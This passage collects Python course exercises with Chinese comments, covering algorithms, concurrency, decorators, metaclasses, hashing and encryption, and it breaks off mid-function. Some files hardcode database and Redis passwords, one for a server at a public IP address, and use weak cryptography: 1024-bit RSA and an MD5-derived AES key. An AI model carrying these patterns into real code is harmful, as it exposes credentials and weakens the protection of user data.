File: Day31-35/code/josephu.py def main(): persons = [True] * 30 counter = 0 index = 0 number = 0 while counter < 15: if persons[index]: number += 1 if number == 9: persons[index] = False number = 0 counter += 1 index += 1 index %= len(persons) for person in persons: print('基' if person else '非', end='') print() if __name__ == '__main__': main() File: Day31-35/code/dayofyear.py import sys import mycal def main(): if len(sys.argv) != 4: print('Not enough arguments') return year = int(sys.argv[1]) month = int(sys.argv[2]) day = int(sys.argv[3]) total = 0 for m in range(1, month): total += mycal.get_days(year, m) total += day print(f'{year}年{month}月{day}日是{year}年的第{total}天') if __name__ == '__main__': main() File: Day31-35/code/guess.py #!/usr/bin/python3 # coding: utf-8 from random import randint def main(): answer = randint(1, 100) while True: number = int(input('请输入: ')) if number < answer: print('大一点') elif number > answer: print('小一点') else: print('恭喜你猜对了!') break if __name__ == '__main__': main() File: Day31-35/code/mycal.py #!/usr/bin/python3 from datetime import datetime import sys def is_leap(year): return year % 4 == 0 and year % 100 != 0 or year % 400 == 0 def main(): if len(sys.argv) == 3: month = int(sys.argv[1]) year = int(sys.argv[2]) else: now = datetime.now() date = now.date month = now.month year = now.year m, y = (month, year) if month >= 3 else (month + 12, year - 1) c, y = y // 100, y % 100 w = (y + y // 4 + c // 4 - 2 * c + 26 * (m + 1) // 10) % 7 month_words = [ 'January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December' ] print(f'{month_words[month - 1]} {year}'.center(20)) print('Su Mo Tu We Th Fr Sa') print(' ' * 3 * w, end='') days = [ [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31], [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31] ][is_leap(year)][month - 1] for day in range(1, days + 1): print(str(day).rjust(2), end=' ') w += 1 if w == 7: print() w = 0 print() if __name__ == '__main__': main() File: Day31-35/code/homework01.py # 经典递归求解问题: # 1. 迷宫寻路 # 2. 汉诺塔(梵塔) # 3. 骑士周游 # 4. 八皇后 def f(n: int, m=1) -> int: if n == 0 or n == 1: return m return f(n - 1, n * m) def sum(n: int) -> int: if n == 1: return 1 return n + sum(n - 1) def steps(n: int, m={}) -> int: if n < 0: return 0 elif n == 0: return 1 else: try: return m[n] except: m[n] = steps(n - 1) + steps(n - 2) + steps(n - 3) return m[n] def list_depth(items: list) -> int: max_depth = 1 if isinstance(items, list) else 0 if max_depth: for item in items: if isinstance(item, list): max_depth = max(max_depth, list_depth(item) + 1) return max_depth def main(): mylist = [1, ['a', ['b', ['c']]],[100, [200, 300, [400, [500, [600, [700]]]]]]] thylist = [[], [[[]]], [[], []]] print(list_depth(mylist)) print(list_depth(thylist)) if __name__ == '__main__': main() File: Day16-20/code/example19.py """ 扩展性系统性能 - 垂直扩展 - 增加单节点处理能力 - 水平扩展 - 将单节点变成多节点(读写分离/分布式集群) 并发编程 - 加速程序执行 / 改善用户体验 耗时间的任务都尽可能独立的执行,不要阻塞代码的其他部分 - 多线程 1. 创建Thread对象指定target和args属性并通过start方法启动线程 2. 继承Thread类并重写run方法来定义线程执行的任务 3. 创建线程池对象ThreadPoolExecutor并通过submit来提交要执行的任务 第3种方式可以通过Future对象的result方法在将来获得线程的执行结果 也可以通过done方法判定线程是否执行结束 - 多进程 - 异步I/O """ import glob import os import time from concurrent.futures import ThreadPoolExecutor from threading import Thread from PIL import Image # class ThumbnailThread(Thread): # def __init__(self, infile): # self.infile = infile # super().__init__() # def run(self): # file, ext = os.path.splitext(self.infile) # filename = file[file.rfind('/') + 1:] # for size in (32, 64, 128): # outfile = f'thumbnails/{filename}_{size}_{size}.png' # image = Image.open(self.infile) # image.thumbnail((size, size)) # image.save(outfile, format='PNG') def gen_thumbnail(infile): file, ext = os.path.splitext(infile) filename = file[file.rfind('/') + 1:] for size in (32, 64, 128): outfile = f'thumbnails/{filename}_{size}_{size}.png' image = Image.open(infile) image.thumbnail((size, size)) image.save(outfile, format='PNG') # def main(): # start = time.time() # threads = [] # for infile in glob.glob('images/*'): # # t = Thread(target=gen_thumbnail, args=(infile, )) # t = ThumbnailThread(infile) # t.start() # threads.append(t) # for t in threads: # t.join() # end = time.time() # print(f'耗时: {end - start}秒') def main(): pool = ThreadPoolExecutor(max_workers=30) futures = [] start = time.time() for infile in glob.glob('images/*'): # submit方法是非阻塞式的方法 # 即便工作线程数已经用完,submit方法也会接受提交的任务 future = pool.submit(gen_thumbnail, infile) futures.append(future) for future in futures: # result方法是一个阻塞式的方法 如果线程还没有结束 # 暂时取不到线程的执行结果 代码就会在此处阻塞 future.result() end = time.time() print(f'耗时: {end - start}秒') # shutdown也是非阻塞式的方法 但是如果已经提交的任务还没有执行完 # 线程池是不会停止工作的 shutdown之后再提交任务就不会执行而且会产生异常 pool.shutdown() if __name__ == '__main__': main() File: Day16-20/code/example09.py """ 装饰器 - 装饰器中放置的通常都是横切关注(cross-concern)功能 所谓横切关注功能就是很多地方都会用到但跟正常业务又逻辑没有必然联系的功能 装饰器实际上是实现了设计模式中的代理模式 - AOP(面向切面编程) """ from functools import wraps from random import randint from time import time, sleep import pymysql def record(output): def decorate(func): @wraps(func) def wrapper(*args, **kwargs): start = time() ret_value = func(*args, **kwargs) output(func.__name__, time() - start) return ret_value return wrapper return decorate def output_to_console(fname, duration): print('%s: %.3f秒' % (fname, duration)) def output_to_file(fname, duration): with open('log.txt', 'a') as file_stream: file_stream.write('%s: %.3f秒\n' % (fname, duration)) def output_to_db(fname, duration): con = pymysql.connect(host='localhost', port=3306, database='test', charset='utf8', user='root', password='123456', autocommit=True) try: with con.cursor() as cursor: cursor.execute('insert into tb_record values (default, %s, %s)', (fname, '%.3f' % duration)) finally: con.close() @record(output_to_console) def random_delay(min, max): sleep(randint(min, max)) def main(): for _ in range(3): # print(random_delay.__name__) random_delay(3, 5) # for _ in range(3): # # 取消掉装饰器 # random_delay.__wrapped__(3, 5) if __name__ == '__main__': main() File: Day16-20/code/example18.py """ 元 - meta 元数据 - 描述数据的数据 - metadata 元类 - 描述类的类 - metaclass - 继承自type """ import threading class SingletonMeta(type): """自定义元类""" def __init__(cls, *args, **kwargs): cls.__instance = None cls.lock = threading.Lock() super().__init__(*args, **kwargs) def __call__(cls, *args, **kwargs): if cls.__instance is None: with cls.lock: if cls.__instance is None: cls.__instance = super().__call__(*args, **kwargs) return cls.__instance class President(metaclass=SingletonMeta): """总统(单例类)""" def __init__(self, name, country): self.name = name self.country = country def __str__(self): return f'{self.country}: {self.name}' def main(): """主函数""" p1 = President('特朗普', '美国') p2 = President('奥巴马', '美国') p3 = President.__call__('克林顿', '美国') print(p1 == p2) print(p1 == p3) print(p1, p2, p3, sep='\n') if __name__ == '__main__': main() File: Day16-20/code/example08.py """ 加密和解密 对称加密 - 加密和解密是同一个密钥 - DES / AES 非对称加密 - 加密和解密是不同的密钥 - RSA pip install pycrypto """ import base64 from hashlib import md5 from Crypto.Cipher import AES from Crypto import Random from Crypto.PublicKey import RSA # # AES加密的密钥(长度32个字节) # key = md5(b'1qaz2wsx').hexdigest() # # AES加密的初始向量(随机生成) # iv = Random.new().read(AES.block_size) def main(): """主函数""" # 生成密钥对 key_pair = RSA.generate(1024) # 导入公钥 pub_key = RSA.importKey(key_pair.publickey().exportKey()) # 导入私钥 pri_key = RSA.importKey(key_pair.exportKey()) message1 = 'hello, world!' # 加密数据 data = pub_key.encrypt(message1.encode(), None) # 对加密数据进行BASE64编码 message2 = base64.b64encode(data[0]) print(message2) # 对加密数据进行BASE64解码 data = base64.b64decode(message2) # 解密数据 message3 = pri_key.decrypt(data) print(message3.decode()) # # AES - 对称加密 # str1 = '我爱你们!' # cipher = AES.new(key, AES.MODE_CFB, iv) # # 加密 # str2 = cipher.encrypt(str1) # print(str2) # # 解密 # cipher = AES.new(key, AES.MODE_CFB, iv) # str3 = cipher.decrypt(str2) # print(str3.decode()) if __name__ == '__main__': main() File: Day16-20/code/test_example01.py """ 单元测试 - 针对程序中最小的功能模块(函数和方法)的测试 测试方法: - 白盒测试:程序自己写的测试 - 黑盒测试:测试人员或QA,不知道代码实现细节,只关注功能 编写Python单元测试 - 定义类继承TestCase,写测试方法(test_开头) 执行单元测试: - unittest.main() - python3 -m unittest test_example01.py 第三方库 - nose2 / pytest pip install pytest pytest-cov pytest -v --cov ------------------------------ pip install nose2 cov-core nose2 -v -C """ from unittest import TestCase from example01 import seq_search, bin_search class TestExample01(TestCase): """测试查找函数的测试用例""" # 执行每个测试函数之前要执行的方法 def setUp(self): self.data1 = [35, 97, 12, 68, 55, 73, 81, 40] self.data2 = [12, 35, 40, 55, 68, 73, 81, 97] # 执行每个测试函数之后要执行的方法 def tearDown(self): pass def test_seq_search(self): """测试顺序查找""" self.assertEqual(0, seq_search(self.data1, 35)) self.assertEqual(2, seq_search(self.data1, 12)) self.assertEqual(6, seq_search(self.data1, 81)) self.assertEqual(7, seq_search(self.data1, 40)) self.assertEqual(-1, seq_search(self.data1, 99)) self.assertEqual(-1, seq_search(self.data1, 7)) def test_bin_search(self): """测试二分查找""" self.assertEqual(1, bin_search(self.data2, 35)) self.assertEqual(0, bin_search(self.data2, 12)) self.assertEqual(6, bin_search(self.data2, 81)) self.assertEqual(2, bin_search(self.data2, 40)) self.assertEqual(7, bin_search(self.data2, 97)) self.assertEqual(-1, bin_search(self.data2, 7)) self.assertEqual(-1, bin_search(self.data2, 99)) File: Day16-20/code/example23.py """ 协程(coroutine)- 可以在需要时进行切换的相互协作的子程序 """ import asyncio from example15 import is_prime def num_generator(m, n): """指定范围的数字生成器""" yield from range(m, n + 1) async def prime_filter(m, n): """素数过滤器""" primes = [] for i in num_generator(m, n): if is_prime(i): print('Prime =>', i) primes.append(i) await asyncio.sleep(0.001) return tuple(primes) async def square_mapper(m, n): """平方映射器""" squares = [] for i in num_generator(m, n): print('Square =>', i * i) squares.append(i * i) await asyncio.sleep(0.001) return squares def main(): """主函数""" loop = asyncio.get_event_loop() future = asyncio.gather(prime_filter(2, 100), square_mapper(1, 100)) future.add_done_callback(lambda x: print(x.result())) loop.run_until_complete(future) loop.close() if __name__ == '__main__': main() File: Day16-20/code/example17.py """ 多重继承 - 一个类有两个或者两个以上的父类 MRO - 方法解析顺序 - Method Resolution Order 当出现菱形继承(钻石继承)的时候,子类到底继承哪个父类的方法 Python 2.x - 深度优先搜索 Python 3.x - C3算法 - 类似于广度优先搜索 """ class A(): def say_hello(self): print('Hello, A') class B(A): pass class C(A): def say_hello(self): print('Hello, C') class D(B, C): pass class SetOnceMappingMixin(): """自定义混入类""" __slots__ = () def __setitem__(self, key, value): if key in self: raise KeyError(str(key) + ' already set') return super().__setitem__(key, value) class SetOnceDict(SetOnceMappingMixin, dict): """自定义字典""" pass def main(): print(D.mro()) # print(D.__mro__) D().say_hello() print(SetOnceDict.__mro__) my_dict= SetOnceDict() my_dict['username'] = 'jackfrued' my_dict['username'] = 'hellokitty' if __name__ == '__main__': main() File: Day16-20/code/example07.py """ 哈希摘要 - 数字签名/指纹 - 单向哈希函数(没有反函数不可逆) 应用领域: 1. 数据库中的用户敏感信息保存成哈希摘要 2. 给数据生成签名验证数据没有被恶意篡改 3. 云存储服务的秒传功能(去重功能) """ class StreamHasher(): """摘要生成器""" def __init__(self, algorithm='md5', size=4096): """初始化方法 @params: algorithm - 哈希摘要算法 size - 每次读取数据的大小 """ self.size = size cls = getattr(__import__('hashlib'), algorithm.lower()) self.hasher = cls() def digest(self, file_stream): """生成十六进制的摘要字符串""" # data = file_stream.read(self.size) # while data: # self.hasher.update(data) # data = file_stream.read(self.size) for data in iter(lambda: file_stream.read(self.size), b''): self.hasher.update(data) return self.hasher.hexdigest() def __call__(self, file_stream): return self.digest(file_stream) def main(): """主函数""" hasher1 = StreamHasher() hasher2 = StreamHasher('sha1') hasher3 = StreamHasher('sha256') with open('Python-3.7.2.tar.xz', 'rb') as file_stream: print(hasher1.digest(file_stream)) file_stream.seek(0, 0) print(hasher2.digest(file_stream)) file_stream.seek(0, 0) print(hasher3(file_stream)) if __name__ == '__main__': main() File: Day16-20/code/example13.py from example12 import EmployeeFactory def main(): """主函数""" emps = [ EmployeeFactory.create('M', '曹操'), EmployeeFactory.create('P', '荀彧', 120), EmployeeFactory.create('P', '郭嘉', 85), EmployeeFactory.create('S', '典韦', 123000), ] for emp in emps: print('%s: %.2f元' % (emp.name, emp.get_salary())) if __name__ == '__main__': main() File: Day16-20/code/example03.py """ 函数递归调用 - 函数直接或者间接的调用了自身 1. 收敛条件 2. 递归公式 n! = n * (n-1)! f(n) = f(n-1) + f(n-2) 1 1 2 3 5 8 13 21 34 55 ... """ from contextlib import contextmanager from time import perf_counter def fac(num): """求阶乘""" assert num >= 0 if num in (0, 1): return 1 return num * fac(num - 1) def fib2(num): """普通函数""" a, b = 1, 1 for _ in range(num - 1): a, b = b, a + b return a def fib3(num): """生成器""" a, b = 0, 1 for _ in range(num): a, b = b, a + b yield a # 动态规划 - 保存可能进行重复运算的中间结果(空间换时间) def fib(num, results={}): """斐波拉切数""" assert num > 0 if num in (1, 2): return 1 try: return results[num] except KeyError: results[num] = fib(num - 1) + fib(num - 2) return results[num] @contextmanager def timer(): try: start = perf_counter() yield finally: end = perf_counter() print(f'{end - start}秒') def main(): """主函数""" # for val in fib3(20): # print(val) # gen = fib3(20) # for _ in range(10): # print(next(gen)) for num in range(1, 121): with timer(): print(f'{num}: {fib(num)}') # print(fac(5)) # print(fac(-5)) if __name__ == '__main__': main() File: Day16-20/code/example12.py """ 面向对象的三大支柱:封装、继承、多态 面向对象的设计原则:SOLID原则 面向对象的设计模式:GoF设计模式(单例、工厂、代理、策略、迭代器) 月薪结算系统 - 部门经理每月15000 程序员每小时200 销售员1800底薪加销售额5%提成 """ from abc import ABCMeta, abstractmethod class Employee(metaclass=ABCMeta): """员工(抽象类)""" def __init__(self, name): self.name = name @abstractmethod def get_salary(self): """结算月薪(抽象方法)""" pass class Manager(Employee): """部门经理""" def get_salary(self): return 15000.0 class Programmer(Employee): """程序员""" def __init__(self, name, working_hour=0): self.working_hour = working_hour super().__init__(name) def get_salary(self): return 200.0 * self.working_hour class Salesman(Employee): """销售员""" def __init__(self, name, sales=0.0): self.sales = sales super().__init__(name) def get_salary(self): return 1800.0 + self.sales * 0.05 class EmployeeFactory(): """创建员工的工厂(工厂模式 - 通过工厂实现对象使用者和对象之间的解耦合)""" @staticmethod def create(emp_type, *args, **kwargs): """创建员工""" emp_type = emp_type.upper() emp = None if emp_type == 'M': emp = Manager(*args, **kwargs) elif emp_type == 'P': emp = Programmer(*args, **kwargs) elif emp_type == 'S': emp = Salesman(*args, **kwargs) return emp File: Day16-20/code/example02.py """ 排序 - 冒泡排序、选择排序、归并排序、快速排序 冒泡排序 - O(n ** 2):两两比较,大的下沉 35, 97, 12, 68, 55, 73, 81, 40 35, 12, 68, 55, 73, 81, 40, [97] 12, 35, 55, 68, 73, 40, [81] 12, 35, 55, 68, 40, [73] ... 选择排序 - O(n ** 2):每次从剩下元素中选择最小 ----------------------------------------- 归并排序 - O(n * log_2 n) - 高级排序算法 35, 97, 12, 68, 55, 73, 81, 40 [35, 97, 12, 68], [55, 73, 81, 40] [35, 97], [12, 68], [55, 73], [81, 40] [35], [97], [12], [68], [55], [73], [81], [40] [35, 97], [12, 68], [55, 73], [40, 81] [12, 35, 68, 97], [40, 55, 73, 81] [12, 35, 40, 55, 68, 73, 81, 97] ----------------------------------------- 快速排序 - 以枢轴为界将列表中的元素划分为两个部分,左边都比枢轴小,右边都比枢轴大 35, 97, 12, 68, 55, 73, 81, 40 35, 12, [40], 68, 55, 73, 81, 97 [12], 35, [40], 68, 55, 73, 81, [97] [12], 35, [40], 55, [68], 73, 81, [97] [12], 35, [40], 55, [68], 73, [81], [97] """ class Person(object): """人""" def __init__(self, name, age): self.name = name self.age = age # def __gt__(self, other): # return self.name > other.name def __str__(self): return f'{self.name}: {self.age}' def __repr__(self): return self.__str__() def select_sort(origin_items, comp=lambda x, y: x < y): """简单选择排序""" items = origin_items[:] for i in range(len(items) - 1): min_index = i for j in range(i + 1, len(items)): if comp(items[j], items[min_index]): min_index = j items[i], items[min_index] = items[min_index], items[i] return items # 函数的设计要尽量做到无副作用(不影响调用者) # 9 1 2 3 4 5 6 7 8 # 9 2 3 4 5 6 7 8 1 # *前面的参数叫位置参数,传参时只需要对号入座即可 # *后面的参数叫命名关键字参数,传参时必须给出参数名和参数值 # *args - 可变参数 - 元组 # **kwargs - 关键字参数 - 字典 def bubble_sort(origin_items, *, comp=lambda x, y: x > y): """冒泡排序""" items = origin_items[:] for i in range(1, len(items)): swapped = False for j in range(i - 1, len(items) - i): if comp(items[j], items[j + 1]): items[j], items[j + 1] = items[j + 1], items[j] swapped = True if swapped: swapped = False for j in range(len(items) - i - 1, i - 1, -1): if comp(items[j - 1], items[j]): items[j], items[j - 1] = items[j - 1], items[j] swapped = True if not swapped: break return items def merge_sort(items, comp=lambda x, y: x <= y): """归并排序""" if len(items) < 2: return items[:] mid = len(items) // 2 left = merge_sort(items[:mid], comp) right = merge_sort(items[mid:], comp) return merge(left, right, comp) def merge(items1, items2, comp=lambda x, y: x <= y): """合并(将两个有序列表合并成一个新的有序列表)""" items = [] index1, index2 = 0, 0 while index1 < len(items1) and index2 < len(items2): if comp(items1[index1], items2[index2]): items.append(items1[index1]) index1 += 1 else: items.append(items2[index2]) index2 += 1 items += items1[index1:] items += items2[index2:] return items def quick_sort(origin_items, comp=lambda x, y: x <= y): """快速排序""" items = origin_items[:] _quick_sort(items, 0, len(items) - 1, comp) return items def _quick_sort(items, start, end, comp): """递归调用划分和排序""" if start < end: pos = _partition(items, start, end, comp) _quick_sort(items, start, pos - 1, comp) _quick_sort(items, pos + 1, end, comp) def _partition(items, start, end, comp): """划分""" pivot = items[end] i = start - 1 for j in range(start, end): if comp(items[j], pivot): i += 1 items[i], items[j] = items[j], items[i] items[i + 1], items[end] = items[end], items[i + 1] return i + 1 def main(): """主函数""" items = [35, 97, 12, 68, 55, 73, 81, 40] # print(bubble_sort(items)) # print(select_sort(items)) # print(merge_sort(items)) print(quick_sort(items)) items2 = [ Person('Wang', 25), Person('Luo', 39), Person('Zhang', 50), Person('He', 20) ] # print(bubble_sort(items2, comp=lambda p1, p2: p1.age > p2.age)) # print(select_sort(items2, comp=lambda p1, p2: p1.name < p2.name)) # print(merge_sort(items2, comp=lambda p1, p2: p1.age <= p2.age)) print(quick_sort(items2, comp=lambda p1, p2: p1.age <= p2.age)) items3 = ['apple', 'orange', 'watermelon', 'durian', 'pear'] # print(bubble_sort(items3)) # print(bubble_sort(items3, comp=lambda x, y: len(x) > len(y))) # print(merge_sort(items3)) print(merge_sort(items3)) if __name__ == '__main__': main() File: Day16-20/code/example22.py """ 多进程和进程池的使用 多线程因为GIL的存在不能够发挥CPU的多核特性 对于计算密集型任务应该考虑使用多进程 time python3 example22.py real 0m11.512s user 0m39.319s sys 0m0.169s """ import concurrent.futures import math PRIMES = [ 1116281, 1297337, 104395303, 472882027, 533000389, 817504243, 982451653, 112272535095293, 112582705942171, 112272535095293, 115280095190773, 115797848077099, 1099726899285419 ] * 5 def is_prime(n): """判断素数""" if n % 2 == 0: return False sqrt_n = int(math.floor(math.sqrt(n))) for i in range(3, sqrt_n + 1, 2): if n % i == 0: return False return True def main(): """主函数""" with concurrent.futures.ProcessPoolExecutor() as executor: for number, prime in zip(PRIMES, executor.map(is_prime, PRIMES)): print('%d is prime: %s' % (number, prime)) if __name__ == '__main__': main() File: Day16-20/code/example16.py """ 魔术方法 如果要把自定义对象放到set或者用作dict的键 那么必须要重写__hash__和__eq__两个魔术方法 前者用来计算对象的哈希码,后者用来判断两个对象是否相同 哈希码不同的对象一定是不同的对象,但哈希码相同未必是相同的对象(哈希码冲撞) 所以在哈希码相同的时候还要通过__eq__来判定对象是否相同 """ class Student(): __slots__ = ('stuid', 'name', 'gender') def __init__(self, stuid, name): self.stuid = stuid self.name = name def __hash__(self): return hash(self.stuid) + hash(self.name) def __eq__(self, other): return self.stuid == other.stuid and \ self.name == other.name def __str__(self): return f'{self.stuid}: {self.name}' def __repr__(self): return self.__str__() class School(): def __init__(self, name): self.name = name self.students = {} def __setitem__(self, key, student): self.students[key] = student def __getitem__(self, key): return self.students[key] def main(): # students = set() # students.add(Student(1001, '王大锤')) # students.add(Student(1001, '王大锤')) # students.add(Student(1001, '白元芳')) # print(len(students)) # print(students) stu = Student(1234, '骆昊') stu.gender = 'Male' # stu.birth = '1980-11-28' print(stu.name, stu.birth) school = School('千锋教育') school[1001] = Student(1001, '王大锤') school[1002] = Student(1002, '白元芳') school[1003] = Student(1003, '白洁') print(school[1002]) print(school[1003]) if __name__ == '__main__': main() File: Day16-20/code/example06.py """ 编码和解码 - BASE64 0-9A-Za-z+/ 1100 0101 1001 0011 0111 0110 00110001 00011001 00001101 00110110 base64 b64encode / b64decode ------------------------------------- 序列化和反序列化 序列化 - 将对象变成字节序列(bytes)或者字符序列(str) - 串行化/腌咸菜 反序列化 - 把字节序列或者字符序列还原成对象 Python标准库对序列化的支持: json - 字符形式的序列化 pickle - 字节形式的序列化 dumps / loads """ import base64 import json import redis from example02 import Person class PersonJsonEncoder(json.JSONEncoder): def default(self, o): return o.__dict__ def main(): cli = redis.StrictRedis(host='120.77.222.217', port=6379, password='123123') data = base64.b64decode(cli.get('guido')) with open('guido2.jpg', 'wb') as file_stream: file_stream.write(data) # with open('guido.jpg', 'rb') as file_stream: # result = base64.b64encode(file_stream.read()) # cli.set('guido', result) # persons = [ # Person('骆昊', 39), Person('王大锤', 18), # Person('白元芳', 25), Person('狄仁杰', 37) # ] # persons = json.loads(cli.get('persons')) # print(persons) # cli.set('persons', json.dumps(persons, cls=PersonJsonEncoder)) if __name__ == '__main__': main() File: Day16-20/code/example11.py """ 变量的作用域以及Python搜索变量的顺序 LEGB: Local --> Embedded --> Global --> Built-in global - 声明或定义全局变量(要么直接使用现有的全局作用域的变量,要么定义一个变量放到全局作用域) nonlocal - 声明使用嵌套作用域的变量(如果嵌套作用域没有对应的变量直接报错) """ x = 100 def foo(): global x x = 200 def bar(): x = 300 print(x) bar() print(x) foo() print(x) File: Day16-20/code/example01.py """ 查找 - 顺序查找和二分查找 算法:解决问题的方法(步骤) 评价一个算法的好坏主要有两个指标:渐近时间复杂度和渐近空间复杂度,通常一个算法很难做到时间复杂度和空间复杂度都很低(因为时间和空间是不可调和的矛盾) 表示渐近时间复杂度通常使用大O标记 O(c):常量时间复杂度 - 哈希存储 / 布隆过滤器 O(log_2 n):对数时间复杂度 - 折半查找 O(n):线性时间复杂度 - 顺序查找 O(n * log_2 n):- 对数线性时间复杂度 - 高级排序算法(归并排序、快速排序) O(n ** 2):平方时间复杂度 - 简单排序算法(冒泡排序、选择排序、插入排序) O(n ** 3):立方时间复杂度 - Floyd算法 / 矩阵乘法运算 也称为多项式时间复杂度 O(2 ** n):几何级数时间复杂度 - 汉诺塔 O(3 ** n):几何级数时间复杂度 也称为指数时间复杂度 O(n!):阶乘时间复杂度 - 旅行经销商问题 - NP """ from math import log2, factorial from matplotlib import pyplot import numpy def seq_search(items: list, elem) -> int: """顺序查找""" for index, item in enumerate(items): if elem == item: return index return -1 def bin_search(items, elem): """二分查找""" start, end = 0, len(items) - 1 while start <= end: mid = (start + end) // 2 if elem > items[mid]: start = mid + 1 elif elem < items[mid]: end = mid - 1 else: return mid return -1 def main(): """主函数(程序入口)""" num = 6 styles = ['r-.', 'g-*', 'b-o', 'y-x', 'c-^', 'm-+', 'k-d'] legends = ['对数', '线性', '线性对数', '平方', '立方', '几何级数', '阶乘'] x_data = [x for x in range(1, num + 1)] y_data1 = [log2(y) for y in range(1, num + 1)] y_data2 = [y for y in range(1, num + 1)] y_data3 = [y * log2(y) for y in range(1, num + 1)] y_data4 = [y ** 2 for y in range(1, num + 1)] y_data5 = [y ** 3 for y in range(1, num + 1)] y_data6 = [3 ** y for y in range(1, num + 1)] y_data7 = [factorial(y) for y in range(1, num + 1)] y_datas = [y_data1, y_data2, y_data3, y_data4, y_data5, y_data6, y_data7] for index, y_data in enumerate(y_datas): pyplot.plot(x_data, y_data, styles[index]) pyplot.legend(legends) pyplot.xticks(numpy.arange(1, 7, step=1)) pyplot.yticks(numpy.arange(0, 751, step=50)) pyplot.show() if __name__ == '__main__': main() File: Day16-20/code/example21.py """ 多个线程竞争一个资源 - 保护临界资源 - 锁(Lock/RLock) 多个线程竞争多个资源(线程数>资源数) - 信号量(Semaphore) 多个线程的调度 - 暂停线程执行/唤醒等待中的线程 - Condition """ from concurrent.futures import ThreadPoolExecutor from random import randint from time import sleep import threading class Account(): """银行账户""" def __init__(self, balance=0): self.balance = balance lock = threading.Lock() self.condition = threading.Condition(lock) def withdraw(self, money): """取钱""" with self.condition: while money > self.balance: self.condition.wait() new_balance = self.balance - money sleep(0.001) self.balance = new_balance def deposit(self, money): """存钱""" with self.condition: new_balance = self.balance + money sleep(0.001) self.balance = new_balance self.condition.notify_all() def add_money(account): while True: money = randint(5, 10) account.deposit(money) print(threading.current_thread().name, ':', money, '====>', account.balance) sleep(0.5) def sub_money(account): while True: money = randint(10, 30) account.withdraw(money) print(threading.current_thread().name, ':', money, '<====', account.balance) sleep(1) def main(): account = Account() with ThreadPoolExecutor(max_workers=10) as pool: for _ in range(5): pool.submit(add_money, account) pool.submit(sub_money, account) if __name__ == '__main__': main() File: Day16-20/code/example15.py """ 迭代器 - __iter__ / __next__ itertools - 生成可迭代序列的工具模块 """ import itertools from math import sqrt def is_prime(num): """判断素数""" for factor in range(2, int(sqrt(num)) + 1): if num % factor == 0: return False return True class PrimeIter(object): """素数迭代器""" def __init__(self, min_value, max_value): assert 2 <= min_value <= max_value self.min_value = min_value - 1 self.max_value = max_value def __iter__(self): return self def __next__(self): self.min_value += 1 while self.min_value <= self.max_value: if is_prime(self.min_value): return self.min_value self.min_value += 1 raise StopIteration() class FibIter(object): """斐波那契数迭代器""" def __init__(self, num): self.num = num self.a, self.b = 0, 1 self.idx = 0 def __iter__(self): return self def __next__(self): if self.idx < self.num: self.a, self.b = self.b, self.a + self.b self.idx += 1 return self.a raise StopIteration() def main(): # for val in itertools.permutations('ABCD'): # print(val) # for val in itertools.combinations('ABCDE', 3): # print(val) # for val in itertools.product('黑红梅方', range(1, 14)): # print(val) # fib_iter = FibIter(20) # print('===>', next(fib_iter)) # print('===>', next(fib_iter)) # for val in fib_iter: # print(val) prime_iter = PrimeIter(2, 100000) for val in prime_iter: print(val) if __name__ == '__main__': main() File: Day16-20/code/example05.py """ 递归回溯法:叫称为试探法,按选优条件向前搜索,当搜索到某一步, 发现原先选择并不优或达不到目标时,就退回一步重新选择。 经典问题:骑士巡逻 """ import os import sys import time SIZE = 5 total = 0 def print_board(board): # os.system('clear') for row in board: for col in row: print(str(col).center(4), end='') print() def patrol(board, row, col, step=1): if row >= 0 and row < SIZE and \ col >= 0 and col < SIZE and \ board[row][col] == 0: board[row][col] = step if step == SIZE * SIZE: global total total += 1 print(f'第{total}种走法: ') print_board(board) patrol(board, row - 2, col - 1, step + 1) patrol(board, row - 1, col - 2, step + 1) patrol(board, row + 1, col - 2, step + 1) patrol(board, row + 2, col - 1, step + 1) patrol(board, row + 2, col + 1, step + 1) patrol(board, row + 1, col + 2, step + 1) patrol(board, row - 1, col + 2, step + 1) patrol(board, row - 2, col + 1, step + 1) board[row][col] = 0 def main(): board = [[0] * SIZE for _ in range(SIZE)] patrol(board, SIZE - 1, SIZE - 1) if __name__ == '__main__': main() File: Day16-20/code/example20.py """ 线程间通信(共享数据)非常简单因为可以共享同一个进程的内存 进程间通信(共享数据)比较麻烦因为操作系统会保护分配给进程的内存 要实现多进程间的通信通常可以用系统管道、套接字、三方服务来实现 multiprocessing.Queue 守护线程 - daemon thread 守护进程 - firewalld / httpd / mysqld 在系统停机的时候不保留的进程 - 不会因为进程还没有执行结束而阻碍系统停止 """ from threading import Thread from time import sleep def output(content): while True: print(content, end='') def main(): Thread(target=output, args=('Ping', ), daemon=True).start() Thread(target=output, args=('Pong', ), daemon=True).start() sleep(5) print('bye!') if __name__ == '__main__': main() File: Day16-20/code/example14.py """ 面向对象 枚举 - 一个变量的值只有有限个选择,最适合的类型就是枚举 通过枚举我们可以定义符号常量,符号常量优于字面常量 """ from enum import Enum, unique import random @unique class Suite(Enum): """花色(枚举)""" SPADE, HEART, CLUB, DIAMOND = range(4) def __lt__(self, other): return self.value < other.value class Card(): """牌""" def __init__(self, suite, face): self.suite = suite self.face = face def __repr__(self): return self.__str__() def __str__(self): suites = ('♠️', '♥️', '♣️', '♦️') faces = ('', 'A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K') return f'{suites[self.suite.value]} {faces[self.face]}' class Poker(): """扑克""" def __init__(self): self.index = 0 self.cards = [Card(suite, face) for suite in Suite for face in range(1, 14)] def shuffle(self): """洗牌""" self.index = 0 random.shuffle(self.cards) def deal(self): """发牌""" card = self.cards[self.index] self.index += 1 return card @property def has_more(self): """是否有更多的牌""" return self.index < len(self.cards) class Player(): """玩家""" def __init__(self, name): self.name = name self.cards = [] def get_card(self, card): """摸牌""" self.cards.append(card) def arrange(self): """整理手上的牌""" self.cards.sort(key=lambda card: (card.suite, card.face)) def main(): """主函数""" poker = Poker() poker.shuffle() players = [ Player('东邪'), Player('西毒'), Player('南帝'), Player('北丐') ] while poker.has_more: for player in players: player.get_card(poker.deal()) for player in players: player.arrange() print(player.name, end=': ') print(player.cards) if __name__ == '__main__': main() File: Day16-20/code/example04.py """ 贪婪法:在对问题求解时,总是做出在当前看来是最好的选择, 不追求最优解,快速找到满意解。 """ class Thing(object): """物品""" def __init__(self, name, price, weight): self.name = name self.price = price self.weight = weight @property def value(self): """价格重量比""" return self.price / self.weight def input_thing(): 